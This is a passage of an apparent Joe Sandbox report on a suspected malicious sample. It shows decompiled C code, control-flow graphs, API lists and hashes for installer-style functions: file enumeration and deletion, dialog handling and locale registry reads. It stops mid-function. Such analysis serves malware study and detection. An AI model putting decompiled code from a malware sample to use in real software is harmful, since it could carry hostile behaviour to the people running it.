                    0x00405e3d
                    0x00405e5d
                    0x00405e65
                    0x00405e6a
                    0x00405e71
                    0x00405e8c
                    0x00405e91
                    0x00405e93
                    0x00405eb7
                    0x00405e95
                    0x00405e95
                    0x00405e98
                    0x00405eac
                    0x00405e9a
                    0x00405e9d
                    0x00405ea5
                    0x00405ea5
                    0x00405e98
                    0x00405e73
                    0x00405e79
                    0x00405e7b
                    0x00405e81
                    0x00405e81
                    0x00405e7b
                    0x00000000
                    0x00405e71
                    0x00405e3f
                    0x00405e47
                    0x00000000
                    0x00000000
                    0x00405e49
                    0x00405e51
                    0x00000000
                    0x00000000
                    0x00405e53
                    0x00405e5b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ebc
                    0x00405ec4
                    0x00405eca
                    0x00405eca
                    0x00405ed3
                    0x00000000
                    0x00405ed3
                    0x00405dfe
                    0x00405e06
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405dc2
                    0x00405dc2
                    0x00405dc4
                    0x00405ee4
                    0x00405ee6
                    0x00405ee9
                    0x00405f3a
                    0x00405f3a
                    0x00405f3a
                    0x00405eeb
                    0x00405eee
                    0x00405ef9
                    0x00405efe
                    0x00405f00
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f0f
                    0x00405f14
                    0x00405f16
                    0x00000000
                    0x00405f31
                    0x00405f18
                    0x00405f1b
                    0x00000000
                    0x00000000
                    0x00405f20
                    0x00000000
                    0x00405f27
                    0x00405ef0
                    0x00405ef0
                    0x00000000
                    0x00405ef0
                    0x00405dca
                    0x00405dcd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405dcd

                    APIs
                    • DeleteFileW.KERNELBASE(?,?,7620FAA0,7620F560,00000000), ref: 00405DA3
                    • lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7620FAA0,7620F560,00000000), ref: 00405E14
                    • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7620FAA0,7620F560,00000000), ref: 00405E24
                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                    • FindClose.KERNELBASE(00000000), ref: 00405ED3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: .$.$\*.*
                    • API String ID: 2035342205-3749113046
                    • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                    • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                    • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                    • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004069A4(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4fd8;
			}




                    0x004069af
                    0x004069b8
                    0x00000000
                    0x004069c5
                    0x004069bb
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNELBASE(7620FAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560), ref: 004069AF
                    • FindClose.KERNEL32(00000000), ref: 004069BB
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                    • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                    • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                    • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 144 4040ef-4040f8 142->144 145 4042a2-4042b7 143->145 146 404255-404290 GetDlgItem * 2 call 4045ca KiUserCallbackDispatcher call 40140b 143->146 150 4040fa-404107 SetWindowPos 144->150 151 40410d-404114 144->151 148 4042f7-4042fc call 404616 145->148 149 4042b9-4042bc 145->149 167 404295-40429d 146->167 163 404301-40431c 148->163 153 4042be-4042c9 call 401389 149->153 154 4042ef-4042f1 149->154 150->151 156 404116-404130 ShowWindow 151->156 157 404158-40415e 151->157 153->154 180 4042cb-4042ea SendMessageW 153->180 154->148 162 404597 154->162 164 404231-40423f call 404631 156->164 165 404136-404149 GetWindowLongW 156->165 159 404160-404172 DestroyWindow 157->159 160 404177-40417a 157->160 168 404574-40457a 159->168 170 40417c-404188 SetWindowLongW 160->170 171 40418d-404193 160->171 169 404599-4045a0 162->169 174 404325-40432b 163->174 175 40431e-404320 call 40140b 163->175 164->169 165->164 166 40414f-404152 ShowWindow 165->166 166->157 167->145 168->162 176 40457c-404582 168->176 170->169 171->164 179 404199-4041a8 GetDlgItem 171->179 177 404331-40433c 174->177 178 404555-40456e DestroyWindow EndDialog 174->178 175->174 176->162 183 404584-40458d ShowWindow 176->183 177->178 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 177->184 178->168 185 4041c7-4041ca 179->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 179->186 180->169 183->162 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->162 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->164 196 40421b-40422b SendMessageW 192->196 198 4041e7-4041ed 192->198 193->196 197 4041dc-4041de 193->197 196->164 197->191 201 404204-40420d call 40140b 198->201 202 4041ef-4041f5 call 40140b 198->202 201->164 211 40420f-404219 201->211 209 4041fb 202->209 209->191 211->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->163 233 40446a-40446c 222->233 233->163 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->168 238 4044af-4044dc CreateDialogParamW 235->238 236->162 237 404484-40448a 236->237 237->163 239 404490 237->239 238->168 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 40453b-404553 ShowWindow call 404616 240->245 245->168
                    C-Code - Quality: 84%
                    			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f70 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8aa8 = _t127;
						 *0x7a1f84 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff50 = _t91;
						E004045CA(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
						 *0x7a7a6c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f70 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8ac0;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404616(0x40b);
						while(1) {
							_t36 =  *0x7a1f70;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x7a8ac4;
							if(_t38 ==  *0x7a8ac4) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a6c - _t136;
							if( *0x7a7a6c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045CA(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8b2c - _t136;
							_v28 = _t48;
							if( *0x7a8b2c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045EC(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff50, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8b2c - _t136;
							if( *0x7a8b2c == _t136) {
								_push( *0x7a1f84);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff50);
							}
							E004045FF();
							E0040666E(0x7a1f88, E004040AC());
							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f88);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a78);
									 *0x7a0f60 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x7a7a78 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045CA(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a7a6c - _t136;
									if( *0x7a7a6c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a78, 8);
									E00404616(0x405);
									goto L60;
								}
								__eflags =  *0x7a8b2c - _t136;
								if( *0x7a8b2c != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8b20 - _t136;
								if( *0x7a8b20 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a78); // executed
						 *0x7a8aa8 = _t136;
						EndDialog(_t127,  *0x7a0758); // executed
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
						__eflags =  *0x7a7a6c;
						return 0 |  *0x7a7a6c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8b2c - _t136;
											if( *0x7a8b2c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0758 = 1;
												L23:
												_push(0x78);
												L24:
												E004045A3();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0758 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a78);
						 *0x7a7a78 = _t122;
						L60:
						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x7a3f88 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404631(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                    0x004040d6
                    0x004040dd
                    0x00404244
                    0x00404248
                    0x0040424c
                    0x0040424e
                    0x00404253
                    0x0040425e
                    0x00404269
                    0x0040426e
                    0x00404270
                    0x00404272
                    0x00404275
                    0x0040427a
                    0x00404288
                    0x00404295
                    0x0040429c
                    0x0040429c
                    0x0040429d
                    0x0040429d
                    0x004042a2
                    0x004042a8
                    0x004042af
                    0x004042b5
                    0x004042b7
                    0x004042f7
                    0x004042fc
                    0x00404301
                    0x00404301
                    0x00404306
                    0x0040430f
                    0x00404311
                    0x00404316
                    0x0040431c
                    0x00404320
                    0x00404320
                    0x00404325
                    0x0040432b
                    0x00000000
                    0x00000000
                    0x00404336
                    0x0040433c
                    0x00000000
                    0x00000000
                    0x00404345
                    0x0040434d
                    0x00404352
                    0x00404355
                    0x0040435b
                    0x00404360
                    0x00404363
                    0x00404369
                    0x0040436e
                    0x00404371
                    0x00404377
                    0x0040437f
                    0x00404385
                    0x0040438b
                    0x0040438f
                    0x00404396
                    0x00404396
                    0x00404396
                    0x004043a0
                    0x004043b2
                    0x004043be
                    0x004043c3
                    0x004043cd
                    0x004043d3
                    0x004043d5
                    0x004043da
                    0x004043d7
                    0x004043d7
                    0x004043d7
                    0x004043ea
                    0x00404402
                    0x00404404
                    0x0040440a
                    0x0040441f
                    0x0040440c
                    0x00404415
                    0x00404417
                    0x00404417
                    0x00404425
                    0x00404436
                    0x0040444c
                    0x00404453
                    0x00404459
                    0x0040445d
                    0x00404462
                    0x00404464
                    0x00000000
                    0x0040446a
                    0x0040446a
                    0x0040446c
                    0x00000000
                    0x00000000
                    0x00404472
                    0x00404476
                    0x0040449b
                    0x004044a1
                    0x004044a7
                    0x004044a9
                    0x00000000
                    0x00000000
                    0x004044cf
                    0x004044d5
                    0x004044d7
                    0x004044dc
                    0x00000000
                    0x00000000
                    0x004044e2
                    0x004044e5
                    0x004044e8
                    0x004044ff
                    0x0040450b
                    0x00404524
                    0x0040452a
                    0x0040452e
                    0x00404533
                    0x00404539
                    0x00000000
                    0x00000000
                    0x00404543
                    0x0040454e
                    0x00000000
                    0x0040454e
                    0x00404478
                    0x0040447e
                    0x00000000
                    0x00000000
                    0x00404484
                    0x0040448a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404490
                    0x00404464
                    0x0040455b
                    0x00404567
                    0x0040456e
                    0x00000000
                    0x004042b9
                    0x004042b9
                    0x004042bc
                    0x004042ef
                    0x004042ef
                    0x004042f1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004042f1
                    0x004042be
                    0x004042c2
                    0x004042c7
                    0x004042c9
                    0x00000000
                    0x00000000
                    0x004042d9
                    0x004042e1
                    0x00000000
                    0x004042e7
                    0x004040ef
                    0x004040ef
                    0x004040f3
                    0x004040f8
                    0x00404107
                    0x00404107
                    0x0040410d
                    0x00404114
                    0x00404158
                    0x0040415e
                    0x00404177
                    0x0040417a
                    0x0040418d
                    0x00404193
                    0x00000000
                    0x00000000
                    0x00404199
                    0x004041a4
                    0x004041a6
                    0x004041a8
                    0x004041c7
                    0x004041c7
                    0x004041ca
                    0x004041cf
                    0x004041d2
                    0x004041e2
                    0x004041e3
                    0x004041e5
                    0x0040421b
                    0x0040422b
                    0x00000000
                    0x0040422b
                    0x004041e7
                    0x004041ed
                    0x00404206
                    0x0040420b
                    0x0040420d
                    0x00000000
                    0x00000000
                    0x0040420f
                    0x004041fb
                    0x004041fb
                    0x004041fd
                    0x004041fd
                    0x00000000
                    0x004041fd
                    0x004041f0
                    0x004041f5
                    0x00000000
                    0x004041f5
                    0x004041d4
                    0x004041da
                    0x00000000
                    0x00000000
                    0x004041dc
                    0x00000000
                    0x004041dc
                    0x004041cc
                    0x00000000
                    0x004041cc
                    0x004041b2
                    0x004041b9
                    0x004041bf
                    0x004041c1
                    0x00404597
                    0x00000000
                    0x00404597
                    0x00000000
                    0x004041c1
                    0x0040417f
                    0x00000000
                    0x00404187
                    0x00404166
                    0x0040416c
                    0x00404574
                    0x0040457a
                    0x00404587
                    0x0040458d
                    0x0040458d
                    0x00000000
                    0x00404116
                    0x0040411b
                    0x00404127
                    0x00404130
                    0x00404231
                    0x00000000
                    0x0040414f
                    0x00404152
                    0x00000000
                    0x00404152
                    0x00404130
                    0x00404114

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                    • ShowWindow.USER32(?), ref: 00404127
                    • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                    • ShowWindow.USER32(?,00000004), ref: 00404152
                    • DestroyWindow.USER32 ref: 00404166
                    • SetWindowLongW.USER32 ref: 0040417F
                    • GetDlgItem.USER32 ref: 0040419E
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                    • IsWindowEnabled.USER32(00000000), ref: 004041B9
                    • GetDlgItem.USER32 ref: 00404264
                    • GetDlgItem.USER32 ref: 0040426E
                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                    • GetDlgItem.USER32 ref: 0040437F
                    • ShowWindow.USER32(00000000,?), ref: 004043A0
                    • EnableWindow.USER32(?,?), ref: 004043B2
                    • EnableWindow.USER32(?,?), ref: 004043CD
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
                    • EnableMenuItem.USER32 ref: 004043EA
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                    • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
                    • SetWindowTextW.USER32(?,007A1F88), ref: 00404453
                    • ShowWindow.USER32(?,0000000A), ref: 00404587
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                    • String ID:
                    • API String ID: 2475350683-0
                    • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                    • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                    • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                    • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403D1D Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d42 GetUserDefaultUILanguage call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 255 403d47 251->255 258 403d82-403d93 call 40653c 252->258 259 403d98-403d9e lstrcatW 252->259 257 403da3-403dcc call 403ff3 call 406045 255->257 265 403dd2-403dd7 257->265 266 403e5e-403e66 call 406045 257->266 258->259 259->257 265->266 267 403ddd-403e05 call 40653c 265->267 272 403e74-403e99 LoadImageW 266->272 273 403e68-403e6f call 4066ab 266->273 267->266 274 403e07-403e0b 267->274 276 403f1a-403f22 call 40140b 272->276 277 403e9b-403ecb RegisterClassW 272->277 273->272 278 403e1d-403e29 lstrlenW 274->278 279 403e0d-403e1a call 405f6a 274->279 290 403f24-403f27 276->290 291 403f2c-403f37 call 403ff3 276->291 280 403ed1-403f15 SystemParametersInfoW CreateWindowExW 277->280 281 403fe9 277->281 285 403e51-403e59 call 405f3d call 40666e 278->285 286 403e2b-403e39 lstrcmpiW 278->286 279->278 280->276 284 403feb-403ff2 281->284 285->266 286->285 289 403e3b-403e45 GetFileAttributesW 286->289 294 403e47-403e49 289->294 295 403e4b-403e4c call 405f89 289->295 290->284 300 403fc0-403fc8 call 4057a3 291->300 301 403f3d-403f57 ShowWindow call 4069cb 291->301 294->285 294->295 295->285 306 403fe2-403fe4 call 40140b 300->306 307 403fca-403fd0 300->307 308 403f63-403f75 GetClassInfoW 301->308 309 403f59-403f5e call 4069cb 301->309 306->281 307->290 310 403fd6-403fdd call 40140b 307->310 313 403f77-403f87 GetClassInfoW RegisterClassW 308->313 314 403f8d-403fb0 DialogBoxParamW call 40140b 308->314 309->308 310->290 313->314 318 403fb5-403fbe call 403c6d 314->318 318->284
                    C-Code - Quality: 96%
                    			E00403D1D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8ab0;
				_t22 = E00406A3B(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f88;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
					__eflags =  *0x7a1f88;
					if(__eflags == 0) {
						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004065B5(L"1033", _t73 & 0x0000ffff);
				}
				E00403FF3(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
				 *0x7a8b3c = 0x10000;
				if(E00406045(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00406045(_t98, _t86) == 0) {
